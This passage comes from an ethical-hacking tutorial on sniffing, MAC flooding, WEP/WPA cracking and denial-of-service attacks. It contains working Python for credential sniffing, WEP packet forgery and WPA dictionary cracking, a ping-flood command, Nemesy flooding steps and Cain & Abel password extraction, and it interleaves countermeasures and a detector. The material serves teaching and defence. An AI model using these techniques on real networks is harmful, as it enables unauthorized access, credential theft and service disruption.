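What Wireshark does in the steps above, written out as code so that each layer is visible: walk an Ethernet/IPv4/TCP frame header by header, find the HTTP payload, and pull the form fields out of the POST body. This is an added example and not part of the original tutorial; the frame is constructed in the script (the MAC and IP addresses, ports and the form values are made up, and the checksums are left at zero, which a sniffer does not need anyway).

```python
"""Decode a captured Ethernet/IPv4/TCP frame and extract the fields of an
HTTP POST, the way the Wireshark steps above do by hand.
Added example; the frame is constructed below, not a real capture."""
import struct
from urllib.parse import parse_qs


def build_frame(payload: bytes) -> bytes:
    """Constructed test frame: Ethernet II + 20-byte IPv4 + 20-byte TCP header.
    Checksums are zero here; on the wire they would be filled in."""
    eth = bytes.fromhex("00112233445566778899aabb") + b"\x08\x00"   # dst, src, type=IPv4
    total_len = 20 + 20 + len(payload)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0, 0x4000, 64, 6, 0,
                     bytes([10, 0, 0, 5]), bytes([10, 0, 0, 80]))   # assumed addresses
    tcp = struct.pack("!HHIIBBHHH", 49152, 80, 1, 1, 5 << 4, 0x18, 8192, 0, 0)
    return eth + ip + tcp + payload


def decode_frame(frame: bytes) -> dict:
    """Walk the headers layer by layer and return what a sniffer learns."""
    eth_type = struct.unpack("!H", frame[12:14])[0]
    if eth_type != 0x0800:
        raise ValueError("not an IPv4 frame")
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4                 # header length in bytes
    if ip[9] != 6:
        raise ValueError("not TCP")
    src = ".".join(map(str, ip[12:16]))
    dst = ".".join(map(str, ip[16:20]))
    tcp = ip[ihl:]
    sport, dport = struct.unpack("!HH", tcp[:4])
    data_off = (tcp[12] >> 4) * 4            # TCP header length in bytes
    return {"src": src, "dst": dst, "sport": sport, "dport": dport,
            "payload": tcp[data_off:]}


def extract_post_fields(payload: bytes) -> dict:
    """Split an HTTP request into head and body; return the urlencoded form fields
    (empty dict if this is not a form POST)."""
    head, _, body = payload.partition(b"\r\n\r\n")
    request_line, *header_lines = head.decode("latin-1").split("\r\n")
    method, _path, _version = request_line.split(" ", 2)
    headers = {k.strip().lower(): v.strip()
               for k, v in (h.split(":", 1) for h in header_lines)}
    if method != "POST" or "application/x-www-form-urlencoded" not in headers.get("content-type", ""):
        return {}
    return {k: v[0] for k, v in parse_qs(body.decode("latin-1")).items()}


def sniff_credentials(frame: bytes) -> dict:
    """Flow description plus every form field the POST carried in clear."""
    info = decode_frame(frame)
    return {"flow": f"{info['src']}:{info['sport']} -> {info['dst']}:{info['dport']}",
            "fields": extract_post_fields(info["payload"])}


# Constructed request, mirroring the login form used in the exercise above.
SAMPLE_POST = (b"POST /index.php HTTP/1.1\r\n"
               b"Host: www.techpanda.org\r\n"
               b"Content-Type: application/x-www-form-urlencoded\r\n"
               b"Content-Length: 46\r\n\r\n"
               b"email=admin%40google.com&password=Password2010")

if __name__ == "__main__":
    print(sniff_credentials(build_frame(SAMPLE_POST)))
```

The same parsing applied to an HTTPS capture stops at the TCP payload: after the TLS handshake the bytes that follow are ciphertext, and there is no request line or form body to split, which is the whole point of the countermeasures listed further down.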

What is a MAC Flooding?

MAC flooding is a network sniffing technique that floods the switch's MAC address (CAM) table with frames carrying thousands of random source MAC addresses. The table has a fixed size; once it is full, the switch can no longer learn where new or aged-out hosts are, so it floods frames for those destinations out of every port, behaving like a hub. This makes it possible to sniff data packets as they are sent across the switch, including traffic that was never meant for the attacker's port.

Counter Measures against MAC flooding

  • Some switches have a port security feature. It limits the number of MAC addresses that can be learned on a port (for example one or two on an access port) and drops further frames or shuts the port down when the limit is exceeded. It can also pin specific ("sticky") MAC addresses to a port so that the table cannot be filled from that port at all.

  • 802.1X port-based authentication, backed by an Authentication, Authorization and Accounting (AAA) server such as RADIUS, only lets authenticated devices send frames on a port, so a flooding host never gets onto the switch in the first place.
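The attack and the port security countermeasure above, worked through on a small model of a switch. This is an added example, not code from the original tutorial: the switch model (24 ports, a 1000-entry table, the err-disable behaviour) and the scenario are assumptions chosen to make the effect visible. First the attacker on port 24 floods random source MACs; then a victim on port 3 sends to a server whose table entry the switch does not have, and we check whether that frame reaches the attacker's port.

```python
"""Simulate a switch's MAC address (CAM) table under a MAC flooding attack, with and
without a port security limit. Added example, not from the original tutorial; the
port count, table capacity and err-disable behaviour are assumptions for the demo."""
import random
from collections import defaultdict
from typing import Dict, List, Optional, Set

NUM_PORTS = 24  # assumed: a 24-port access switch


class Switch:
    def __init__(self, cam_capacity: int, port_limit: Optional[int] = None):
        self.cam_capacity = cam_capacity            # entries that fit in the MAC table
        self.port_limit = port_limit                # port-security maximum per port; None = off
        self.cam: Dict[str, int] = {}               # mac -> port
        self.learned_on: Dict[int, Set[str]] = defaultdict(set)
        self.disabled: Set[int] = set()             # ports shut down after a violation
        self.flooded = 0                            # frames copied out of every port

    def learn(self, port: int, src_mac: str) -> bool:
        """Learn src_mac on port. Returns False if port security dropped the frame."""
        if port in self.disabled:
            return False
        if src_mac in self.cam:
            return True
        if self.port_limit is not None and len(self.learned_on[port]) >= self.port_limit:
            self.disabled.add(port)                 # violation: err-disable the port
            return False
        if len(self.cam) < self.cam_capacity:       # a full table simply stops learning
            self.cam[src_mac] = port
            self.learned_on[port].add(src_mac)
        return True

    def forward(self, port: int, src_mac: str, dst_mac: str) -> List[int]:
        """Ports the frame leaves on. Unknown destination = flood, exactly like a hub."""
        if not self.learn(port, src_mac):
            return []
        if dst_mac in self.cam:
            return [self.cam[dst_mac]]
        self.flooded += 1
        return [p for p in range(1, NUM_PORTS + 1) if p != port and p not in self.disabled]


def random_mac(rng: random.Random) -> str:
    return ":".join(f"{rng.randrange(256):02x}" for _ in range(6))


def mac_flood(switch: Switch, attacker_port: int, n_frames: int, seed: int = 1) -> int:
    """Send n_frames with random source MACs from one port; return how many were accepted."""
    rng = random.Random(seed)
    return sum(switch.learn(attacker_port, random_mac(rng)) for _ in range(n_frames))


def run_scenario(port_limit: Optional[int]) -> dict:
    """Attacker on port 24 floods first; then a victim on port 3 sends to a server the
    switch has not learned yet (e.g. its entry aged out during the flood)."""
    sw = Switch(cam_capacity=1000, port_limit=port_limit)
    mac_flood(sw, attacker_port=24, n_frames=5000)
    out_ports = sw.forward(3, "aa:aa:aa:aa:aa:aa", "bb:bb:bb:bb:bb:bb")
    return {
        "cam_entries": len(sw.cam),
        "err_disabled": sorted(sw.disabled),
        "victim_frame_seen_by_attacker": 24 in out_ports,
    }


if __name__ == "__main__":
    print("no port security:", run_scenario(None))
    print("port security max 2:", run_scenario(2))
```

Without port security the table fills with attacker entries and the victim's frame is flooded to every port, port 24 included. With a limit of two addresses per port the third random MAC trips the violation, port 24 is shut, and the victim's frame never reaches it. The same idea is what a detection rule can key on: one port learning hundreds of new source addresses per second is not a normal host.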

Sniffing Counter Measures

  • Restricting physical access to the network media (cabling, switch ports, wiring closets) greatly reduces the chances of a sniffer being installed

  • Encrypting traffic in transit (TLS, IPsec, WPA2/WPA3 on wireless) means a captured packet yields ciphertext only; the attacker can still see who is talking to whom, but not what is said.

  • Replacing plain-text protocols with encrypted equivalents (SSH instead of Telnet and rlogin, HTTPS instead of HTTP, SFTP instead of FTP) removes the credentials a sniffer is after. On switched networks, Dynamic ARP Inspection or static ARP entries for the gateway defeat the ARP poisoning used for active sniffing.

Summary

  • Network sniffing is intercepting packets as they are transmitted over the network

  • Passive sniffing is done on a network that uses a hub. The sniffer only listens, so it is difficult to detect.

  • Active sniffing is done on a network that uses a switch. The attacker has to inject traffic (ARP poisoning or MAC flooding), so it is easier to detect.

  • MAC flooding works by filling the switch's MAC address table with fake MAC addresses. This makes the switch operate like a hub.

  • Security measures as outlined above can help protect the network against sniffing.

 

 

 

How to Hack WiFi (Wireless) Network

Wireless networks are accessible to anyone within the access point's transmission radius, which makes them vulnerable to attacks without any physical access to the premises. Hotspots are available in public places such as airports, restaurants, parks, etc.

In this tutorial, we will introduce you to common techniques used to exploit weaknesses in wireless network security implementations. We will also look at some of the countermeasures you can put in place to protect against such attacks.


 

What is a wireless network?

A wireless network is a network that uses radio waves to link computers and other devices together. The IEEE 802.11 standards define both the radio physical layer (layer 1 of the OSI model) and the MAC sublayer of the data link layer (layer 2), which is where authentication and encryption live.


How to access a wireless network?

You will need a wireless-enabled device such as a laptop, tablet or smartphone, and you must be within the transmission radius of a wireless access point. Most devices (with the wireless option turned on) list the available networks. If a network is not password protected you only have to click connect; if it is, you need the password to gain access.

Wireless Network Authentication

Since the network is easily accessible to everyone with a wireless network enabled device, most networks are password protected. Let’s look at some of the most commonly used authentication techniques.

WEP

WEP is the acronym for Wired Equivalent Privacy. It was the original security mechanism of the IEEE 802.11 WLAN standard. Its goal was to provide privacy equivalent to that of a wired network by encrypting the data being transmitted over the air with the RC4 stream cipher, so that it cannot be read by an eavesdropper.

WEP Authentication

Open System Authentication (OSA) – any station that asks to associate is authenticated; no credential is checked at this step. Access is then governed by the configured policy (and by encryption, if any).

Shared Key Authentication (SKA) – the access point sends a clear-text challenge to the station requesting access. The station encrypts the challenge with the WEP key and sends it back; if it decrypts to the original challenge, access is granted. This is worse than OSA in practice: an eavesdropper who captures both the challenge and the response can XOR them to recover the RC4 keystream for that IV, and then pass the challenge for the same IV without ever knowing the key.

WEP Weakness

WEP has significant design flaws and vulnerabilities.

  • The integrity of each packet is protected only by a Cyclic Redundancy Check (CRC-32), which is a linear checksum and not a cryptographic message authentication code. An attacker can flip chosen bits in the encrypted payload and adjust the encrypted checksum so that the modified packet still passes the integrity check, without knowing the key. This allows injection of forged packets into the network.

  • WEP uses the RC4 stream cipher. The per-packet RC4 key is a 24-bit initialization vector (IV) concatenated with the shared secret key, which is either 40 bits or 104 bits long (marketed as 64-bit and 128-bit WEP). The IV is transmitted in the clear in front of every packet. A 40-bit key is small enough to search by brute force.

  • Certain "weak" IVs produce RC4 keystreams whose first bytes leak information about the secret key (the Fluhrer, Mantin and Shamir attack). Collecting enough packets with such IVs recovers the key statistically, which is what tools like aircrack-ng automate.

  • Many implementations derive the WEP key from a passphrase with a weak generator; such keys can be found by a dictionary attack on the passphrase.

  • Key management is poorly implemented. A single static key is shared by every station, changing it on a large network is laborious, and WEP provides no centralized key management.

  • IVs repeat. With only 2^24 possible values, a busy network reuses an IV within hours, and two packets encrypted under the same IV share the same keystream, so XORing their ciphertexts reveals the XOR of the plaintexts.

Because of these security flaws, WEP has been deprecated in favor of WPA and WPA2.
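Two of the flaws above, worked through on a toy packet: the keystream leak when an IV repeats, and the CRC-32 bit-flipping attack that forges a valid checksum without the key. This is an added example and not from the original tutorial; it uses its own small RC4 implementation with a 40-bit key and packet contents that are made up, and follows the WEP frame layout (IV in the clear, then RC4 over plaintext || CRC-32) without any of the 802.11 framing around it.

```python
"""WEP weaknesses on a toy packet: (1) RC4 keystream reuse when the 24-bit IV repeats,
(2) CRC-32 is linear, so ciphertext bits can be flipped and the encrypted ICV patched
without the key. Added example; the key and packets below are made up."""
import struct
import zlib


def rc4(key: bytes, length: int) -> bytes:
    """RC4 key scheduling + generation; returns `length` keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    while len(out) < length:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def crc32_le(data: bytes) -> bytes:
    """WEP's ICV: CRC-32 of the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body: IV (clear) || RC4_{IV||key}(plaintext || ICV)."""
    body = plaintext + crc32_le(plaintext)
    return iv + xor(body, rc4(iv + key, len(body)))


def wep_decrypt(key: bytes, frame: bytes):
    """Returns (plaintext, icv_ok); a receiver drops the frame when icv_ok is False."""
    iv, body = frame[:3], frame[3:]
    dec = xor(body, rc4(iv + key, len(body)))
    plaintext, icv = dec[:-4], dec[-4:]
    return plaintext, crc32_le(plaintext) == icv


def iv_reuse_leak(frame1: bytes, frame2: bytes) -> bytes:
    """Same IV and key means the same keystream: C1 xor C2 = P1 xor P2, no key needed."""
    if frame1[:3] != frame2[:3]:
        raise ValueError("only useful when the IV repeats")
    return xor(frame1[3:], frame2[3:])


def flip_bits(frame: bytes, delta: bytes) -> bytes:
    """XOR `delta` into the encrypted payload and patch the encrypted ICV to match.
    Works because CRC32(P xor D) = CRC32(P) xor CRC32(D) xor CRC32(all-zero string)."""
    iv, body = frame[:3], frame[3:]
    n = len(body) - 4
    delta = delta.ljust(n, b"\x00")
    icv_delta = zlib.crc32(delta) ^ zlib.crc32(bytes(n))
    patched = xor(body[:n], delta) + xor(body[n:], struct.pack("<I", icv_delta & 0xFFFFFFFF))
    return iv + patched


if __name__ == "__main__":
    key = b"\x01\x02\x03\x04\x05"          # made-up 40-bit WEP key
    iv = b"\x00\x00\x01"
    f1 = wep_encrypt(key, iv, b"GET /index.html ")
    f2 = wep_encrypt(key, iv, b"POST /login.php ")
    print("P1 xor P2 from ciphertexts:", iv_reuse_leak(f1, f2).hex())
    forged = flip_bits(f1, xor(b"GET /index.html ", b"GET /admin.html "))
    print("forged frame decrypts to:", wep_decrypt(key, forged))
```

The forged frame passes the receiver's integrity check even though the attacker never learned the key; a keyed MAC (as WPA2's CCMP uses) would have failed it. The IV-reuse leak is why 2^24 IVs is far too few: once an attacker knows one plaintext (ARP requests and other protocol headers are highly predictable) every other packet under that IV falls with it.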

WPA

WPA is the acronym for Wi-Fi Protected Access. It is a security protocol developed by the Wi-Fi Alliance in response to the weaknesses found in WEP and is used to encrypt data on 802.11 WLANs. WPA (with TKIP) kept RC4 so that existing hardware could be upgraded, but uses a 48-bit IV (the TKIP sequence counter) instead of WEP's 24 bits, derives a fresh temporal key for every packet, and adds the Michael message integrity check. WPA2 replaces RC4 and TKIP with AES-CCMP.

WPA Weaknesses

  • TKIP's Michael integrity check is weak and has been broken, which allows decryption and injection of short packets on WPA-TKIP networks; this is why WPA2 with AES-CCMP replaced it.

  • It is vulnerable to denial of service attacks: management frames such as deauthentication are not authenticated unless 802.11w (management frame protection) is enabled, so anyone can kick clients off the network.

  • Pre-shared keys are derived from passphrases. A weak passphrase is vulnerable to a dictionary attack once an attacker has captured a client's four-way handshake.

How to Crack Wireless Networks

WEP cracking

Cracking is the process of exploiting security weaknesses in wireless networks to gain unauthorized access. WEP cracking refers to attacks on networks that use WEP to implement their security controls. There are basically two types of crack:

  • Passive cracking – the attacker only captures traffic and has no effect on the network until the WEP key has been recovered. It is difficult to detect, but it needs a large number of packets, so it is slow on a quiet network.

  • Active cracking – the attacker injects traffic, for example by replaying captured ARP requests so that the access point generates new IVs quickly. It increases the load on the network and is easier to detect than passive cracking, but it recovers the key far faster.

WEP Cracking Tools

WPA Cracking

WPA-PSK derives a 256-bit pre-shared key from the passphrase and the network name (SSID) using PBKDF2; WPA2-PSK uses the same derivation. Short or common passphrases are vulnerable to dictionary attacks and other password-cracking techniques once an attacker has captured a client's four-way handshake. The following tools can be used to crack WPA keys.
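The passphrase-to-key step that a WPA-PSK dictionary attack has to repeat for every guess, with a small wordlist run against it. This is an added example, not part of the original tutorial; the derivation (PBKDF2-HMAC-SHA1, SSID as salt, 4096 iterations, 32 bytes) is the one the standard specifies, while the wordlist and the target network name are made up. Real tools compare each guess against the MIC of a captured handshake rather than against a known key, but the expensive part, one PBKDF2 run per candidate, is the same.

```python
"""WPA/WPA2-PSK: pairwise master key from passphrase and SSID, and why a short
passphrase falls to a wordlist. Added example; the wordlist and SSID are made up."""
import hashlib
from typing import Iterable, Optional


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 256 bits).
    The standard requires 8 to 63 printable ASCII characters."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8-63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"), ssid.encode("utf-8"), 4096, 32)


def dictionary_attack(target_pmk: bytes, ssid: str, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose PMK matches, or None if the list is exhausted.
    With a captured 4-way handshake the comparison would be against the EAPOL MIC
    instead, but the per-guess cost (one PBKDF2 with 4096 iterations) is identical."""
    for word in wordlist:
        if not 8 <= len(word) <= 63:
            continue                      # cannot be a valid WPA passphrase
        if wpa_pmk(word, ssid) == target_pmk:
            return word
    return None


# Constructed wordlist; a real attack uses millions of entries.
WORDLIST = ["letmein", "password", "qwerty123", "Password2010", "correcthorsebattery"]

if __name__ == "__main__":
    ssid = "techpanda"                    # assumed network name
    weak = wpa_pmk("Password2010", ssid)
    print("weak passphrase recovered as:", dictionary_attack(weak, ssid, WORDLIST))
    strong = wpa_pmk("Tr0ub4dor&3xyz-2019", ssid)
    print("strong passphrase recovered as:", dictionary_attack(strong, ssid, WORDLIST))
```

Two things follow from the code. The SSID is the salt, so rainbow tables only work for common network names, and renaming the network to something unique forces per-network cracking. And 4096 iterations of HMAC-SHA1 is cheap enough that GPUs try hundreds of thousands of guesses per second, so the only defence is a passphrase that is not in any wordlist.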

General Attack types

  • Sniffing – intercepting packets as they are transmitted over the air. The captured data can then be decoded using tools such as Cain & Abel or Wireshark.

  • Man in the Middle (MITM) Attack – the attacker places a device between the client and the real network, typically by running a rogue access point with the same SSID (an "evil twin"), and can then read or modify everything the client sends.

  • Denial of Service Attack – the main intent is to deny legitimate users network resources, for example by sending forged deauthentication frames. FataJack can be used to perform this type of attack.

Cracking Wireless network WEP/WPA keys

It is possible to crack the WEP/WPA keys used to gain access to a wireless network. Doing so requires software and hardware resources, and patience. The success of such attacks also depends on how active the users of the target network are, since both the IVs needed for WEP and the handshake needed for WPA come from their traffic.

We will provide you with basic information that can help you get started. BackTrack is a Linux-based security operating system built on top of Ubuntu; it has since been superseded by Kali Linux, which is based on Debian and carries the same tool set. These distributions can be used to gather information, assess vulnerabilities and perform exploits, among other things.

Some of the popular tools that BackTrack and Kali include are:

  • Metasploit

  • Wireshark

  • Aircrack-ng

  • NMap

  • Ophcrack

Cracking wireless network keys requires patience and the resources mentioned above. At a minimum, you will need the following:

  • A wireless network adapter capable of monitor mode and packet injection (hardware)

  • Kali Operating System. You can download it from here https://www.kali.org/downloads/

  • Be within the target network's radius. If the users of the target network are actively using and connecting to it, your chances of cracking it will be significantly improved.

  • Sufficient knowledge of Linux-based operating systems and a working knowledge of the aircrack-ng suite and its various tools.

  • Patience: cracking the keys may take some time depending on a number of factors, some of which are beyond your control, such as how actively the users of the target network are generating traffic while you capture packets.

 

How to Secure wireless networks

To minimize wireless network attacks, an organization can adopt the following policies:

  • Changing the default administrator passwords that come with the hardware

  • Enabling WPA2 (or WPA3) authentication with AES-CCMP encryption; never use WEP or WPA-TKIP

  • Access to the network can be restricted by allowing only registered MAC addresses, but treat this as a minor hurdle: MAC addresses travel in the clear and are trivial to spoof.

  • Use a long, random WPA-PSK passphrase (a mix of letters, numbers and symbols, well above the 8-character minimum); this is what makes the dictionary and brute-force attacks described above impractical.

  • Firewall Software can also help reduce unauthorized access.

Hacking Activity: Crack Wireless Password

In this practical scenario, we are going to use Cain & Abel to decode the wireless network passwords stored in Windows. We will also provide useful information that can be used to crack the WEP and WPA keys of wireless networks.

Decoding Wireless network passwords stored in Windows

  • Download Cain & Abel from the link provided above.

  • Open Cain & Abel


  • Ensure that the Decoders tab is selected then click on Wireless Passwords from the navigation menu on the left-hand side

  • Click on the button with a plus sign


  • Assuming you have connected to a secured wireless network before, you will get results similar to the ones shown below

 


  • The decoder will show you the encryption type, SSID and the password that was used.

 

Summary

  • Wireless network transmissions can be received by outsiders; this poses many security risks.

  • WEP is the acronym for Wired Equivalent Privacy. It has design flaws which make it far easier to break than the security implementations that replaced it.

  • WPA is the acronym for Wi-Fi Protected Access. It is much stronger than WEP; WPA2 (AES-CCMP) or WPA3 should be used rather than the original WPA (TKIP).

  • Intrusion Detection Systems can help detect unauthorized access

  • A good security policy can help protect a network.

 

DoS (Denial of Service) Attack Tutorial: Ping of Death, DDOS

What is DoS Attack?

DoS is the acronym for Denial of Service. A DoS attack denies legitimate users access to a resource such as a website, network or email service, or makes it extremely slow. It is usually carried out by hitting the target resource, such as a web server, with more requests or traffic than it can handle, so that it fails to respond to legitimate requests. The effect can be anything from slowing the server down to crashing it.

Cutting a business off from the internet can lead to a significant loss of business or money. The internet and computer networks power a lot of businesses, and some organizations, such as payment gateways and e-commerce sites, depend entirely on the internet to do business.

In this tutorial, we will introduce you to what denial of service attack is, how it is performed and how you can protect against such attacks.


Types of DoS Attacks

There are two types of DoS attack:

  • DoS – this type of attack is performed from a single host

  • Distributed DoS (DDoS) – this type of attack is performed by a large number of compromised machines (a botnet) that all target the same victim. It floods the victim with traffic from many sources at once, which makes it much harder to filter by source address.


How DoS attacks work

Let’s look at how DoS attacks are performed and the techniques used. We will look at five common types of attack.

Ping of Death

The ping command is usually used to test the availability of a network resource. It works by sending small ICMP echo request packets to the resource. The ping of death abuses this by sending a datagram larger than the maximum size (65,535 bytes) that IP allows. The sender splits it into fragments, and when the receiving host reassembles them into a datagram larger than its buffers were designed for, the overflow could make old IP stacks freeze, reboot or crash. Modern operating systems have been patched against this for many years.

Smurf

This type of attack sends large amounts of Internet Control Message Protocol (ICMP) echo request (ping) traffic to a network's broadcast address, with the source IP address spoofed to that of the intended victim. Every host on that network replies, and all the replies go to the victim instead of to the attacker. A single ping is therefore amplified by as many hosts as answer on the broadcast network (up to 254 on a /24), and the victim's link is flooded to the point where it is unusable. Routers that drop directed broadcasts from outside remove the amplifier.

Buffer overflow

A buffer is a temporary storage area in RAM that holds data while a program works on it. Buffers have a fixed size. This type of attack sends more data than the buffer was allocated for, so the excess overwrites whatever lies beyond it in memory and the program crashes or behaves unpredictably. An example is sending an email whose attachment file name is longer than the 255 bytes the receiving program reserved for it.

Teardrop

This type of attack uses IP fragmentation. Large datagrams are broken into fragments that are reassembled on the receiving host. The attacker crafts the fragment offsets so that the fragments overlap each other, and the victim can crash as it tries to reassemble them.

SYN attack

SYN is short for Synchronize, the first packet of the TCP three-way handshake. A SYN attack works by flooding the victim with SYN packets, usually from spoofed source addresses, and never completing the handshake. Each half-open connection holds a slot in the server's connection backlog until it times out, so the backlog fills with connections that are never used and legitimate clients are turned away.
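Seen from the defender's side, the four network-level techniques above each leave a distinctive mark in the packet headers; a buffer overflow is an application bug and does not. The detector below, an added example that is not part of the original tutorial, runs those four checks over a list of packet records constructed in the script (the addresses, IP IDs and the 20-connection SYN threshold are assumptions, not standard values), in the style of an IDS rule set.

```python
"""Detect ping of death, smurf, teardrop and SYN flood signatures in packet records.
Added example; the packet list and the thresholds are constructed for the demo.
Each record carries only the header fields a sensor would have."""
from collections import defaultdict

MAX_IP_DATAGRAM = 65535


def detect_dos(packets, syn_threshold=20):
    """Return a list of (technique, detail) findings, in the order they are seen."""
    findings = []
    frags = defaultdict(list)          # (src, dst, ip_id) -> [(byte offset, length)]
    half_open = defaultdict(set)       # dst -> sources whose SYN was never completed
    for p in packets:
        # Ping of death: the reassembled datagram would exceed 65535 bytes.
        if "frag_offset" in p:
            end = p["frag_offset"] * 8 + p["length"]
            if end > MAX_IP_DATAGRAM:
                findings.append(("ping_of_death", f"{p['src']} fragment ends at byte {end}"))
            frags[(p["src"], p["dst"], p["ip_id"])].append((p["frag_offset"] * 8, p["length"]))
        # Smurf: ICMP echo request aimed at a directed broadcast address.
        if p["proto"] == "icmp" and p.get("type") == 8 and p["dst"].endswith(".255"):
            findings.append(("smurf", f"echo request to broadcast {p['dst']} claiming to be {p['src']}"))
        # SYN flood bookkeeping: a SYN opens a slot, the client's ACK closes it.
        if p["proto"] == "tcp":
            if p["flags"] == "S":
                half_open[p["dst"]].add(p["src"])
            elif p["flags"] == "A":
                half_open[p["dst"]].discard(p["src"])
    # Teardrop: two fragments of the same datagram overlap.
    for (src, dst, ip_id), pieces in frags.items():
        pieces.sort()
        for (off1, len1), (off2, _len2) in zip(pieces, pieces[1:]):
            if off2 < off1 + len1:
                findings.append(("teardrop", f"{src}->{dst} id {ip_id} fragments overlap at byte {off2}"))
                break
    # SYN flood: too many half-open connections toward one destination.
    for dst, srcs in half_open.items():
        if len(srcs) >= syn_threshold:
            findings.append(("syn_flood", f"{len(srcs)} half-open connections to {dst}"))
    return findings


# Constructed traffic: one instance of each technique plus one normal handshake.
SAMPLE = [
    # ping of death: last ICMP fragment lands past byte 65535 (8180*8 + 1480 = 66920)
    {"src": "10.0.0.9", "dst": "10.0.0.1", "proto": "icmp", "type": 8,
     "ip_id": 1, "frag_offset": 8180, "length": 1480},
    # smurf: echo request to the broadcast address, source spoofed as the victim
    {"src": "10.0.0.1", "dst": "10.0.0.255", "proto": "icmp", "type": 8},
    # teardrop: second fragment starts at byte 24, inside the first (bytes 0-63)
    {"src": "10.0.0.9", "dst": "10.0.0.2", "proto": "udp", "ip_id": 7, "frag_offset": 0, "length": 64},
    {"src": "10.0.0.9", "dst": "10.0.0.2", "proto": "udp", "ip_id": 7, "frag_offset": 3, "length": 64},
    # a normal client that completes its handshake
    {"src": "10.0.0.7", "dst": "10.0.0.80", "proto": "tcp", "flags": "S"},
    {"src": "10.0.0.7", "dst": "10.0.0.80", "proto": "tcp", "flags": "A"},
]
# SYN flood: 25 spoofed sources send a SYN and never answer
SAMPLE += [{"src": f"192.0.2.{i}", "dst": "10.0.0.80", "proto": "tcp", "flags": "S"}
           for i in range(1, 26)]

if __name__ == "__main__":
    for technique, detail in detect_dos(SAMPLE):
        print(f"{technique:14s} {detail}")
```

A real sensor would add a time window to the SYN count and expire half-open entries the way the kernel's backlog does; without that, any long capture of a busy server would eventually cross the threshold. The fragment checks, on the other hand, are exact: a fragment that ends past 65535 or overlaps its predecessor is never legitimate.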

DoS attack tools

The following are some of the tools that can be used to perform DoS attacks.

  • Nemesy – this tool can be used to generate random packets. It works on Windows. It can be downloaded from http://packetstormsecurity.com/files/25599/nemesy13.zip.html . Due to the nature of the program, anti-virus software will most likely flag it as malware.

  • Land and LaTierra – these tools send TCP packets with spoofed source addresses; the LAND attack sets the source address and port equal to the destination's, which crashed older TCP/IP stacks.

  • Blast – a TCP service stress-testing tool, available from http://www.opencomm.co.uk/products/blast/features.php

  • Panther – this tool can be used to flood a victim’s network with UDP packets.

  • Botnets – these are multitudes of compromised computers on the Internet that can be used to perform a distributed denial of service attack.

DoS Protection: Prevent an attack

An organization can adopt the following policy to protect itself against Denial of Service attacks.

  • Attacks such as Ping of Death and Teardrop exploit bugs in the IP stack, so installing security patches removes them. SYN flooding is resource exhaustion rather than a bug; enable SYN cookies and tune the connection backlog so that half-open connections cannot fill it.

  • Intrusion detection and prevention systems can be used to identify and even stop attack traffic

  • Firewalls can be used to stop simple DoS attacks by blocking all traffic from an attacker once their IP address has been identified. This does not help against a DDoS from thousands of sources, or against spoofed source addresses.

  • Routers can be configured with access control lists to limit access to the network and drop suspected malicious traffic, for example directed broadcasts (the smurf amplifier) and packets arriving from the outside with internal source addresses (ingress filtering).

Hacking Activity: Ping of Death

We will assume you are using Windows for this exercise, and that you have at least two computers on the same network. DoS attacks are illegal against networks you are not authorized to test, which is why you need to set up your own network for this exercise.

Open the command prompt on the target computer

Enter the command ipconfig. You will get results similar to the ones shown below


For this example, we are using mobile broadband connection details. Take note of the IP address. Note: for this example to be effective, you must use a LAN.

Switch to the computer that you want to use for the attack and open the command prompt

We will ping the victim computer continuously with 65,500-byte data packets

Enter the following command

ping 10.128.131.108 -t -l 65500

HERE,

  • “ping” sends ICMP echo request packets to the victim

  • “10.128.131.108” is the IP address of the victim

  • “-t” means the packets should be sent until the program is stopped (Ctrl+C)

  • “-l 65500” specifies the size of the data payload in bytes sent to the victim (the largest value Windows ping accepts)

You will get results similar to the ones shown below


Flooding the target computer with ping packets from a single machine does not have much effect on a modern host, which simply answers or discards them. For the attack to be more effective you would have to ping the target from many computers at once, which is the idea behind a distributed attack.

The same approach can be aimed at routers, web servers, etc.

If you want to see the effects of the attack on the target computer, you can open the task manager and view the network activities.

  • Right click on the taskbar

  • Select Start Task Manager

  • Click on the Networking tab

  • You will get results similar to the following


If the attack is having an effect, you should see increased network activity.

 

Hacking Activity: Launch a DoS attack

In this practical scenario, we are going to use Nemesy to generate data packets and flood the target computer, router or server.

As stated above, Nemesy will be flagged by your anti-virus. You will have to disable the anti-virus for this exercise; do this only on an isolated test machine.


Enter the target IP address; in this example, we have used the target IP from the previous exercise.

HERE,

  • 0 as the number of packets means unlimited. Set it to a specific number if you do not want packets sent until you stop the program.

  • The size field specifies the number of data bytes per packet and the delay specifies the interval between packets in milliseconds.

 

Click on send button

You should be able to see the following results


The title bar will show you the number of packets sent

Click on halt button to stop the program from sending data packets.

You can monitor the task manager of the target computer to see the network activities.

Summary

  • A denial of service attack’s intent is to deny legitimate users access to a resource such as a network, server etc.

  • There are two types of attack: denial of service (from one host) and distributed denial of service (from many compromised hosts).

  • A denial of service attack can be carried out using SYN flooding, Ping of Death, Teardrop, Smurf or a buffer overflow

  • Security patches for operating systems, router configuration, firewalls and intrusion detection systems can be used to protect against denial of service attacks.

 

 

How to Hack a Web Server

Customers usually turn to the internet to get information and buy products and services, so most organizations have websites. Most websites store valuable information such as credit card numbers, email addresses and passwords, which makes them targets for attackers. Defaced websites can also be used to broadcast religious or political messages.

In this tutorial, we will introduce you to web server hacking techniques and how you can protect servers from such attacks.


Web server vulnerabilities

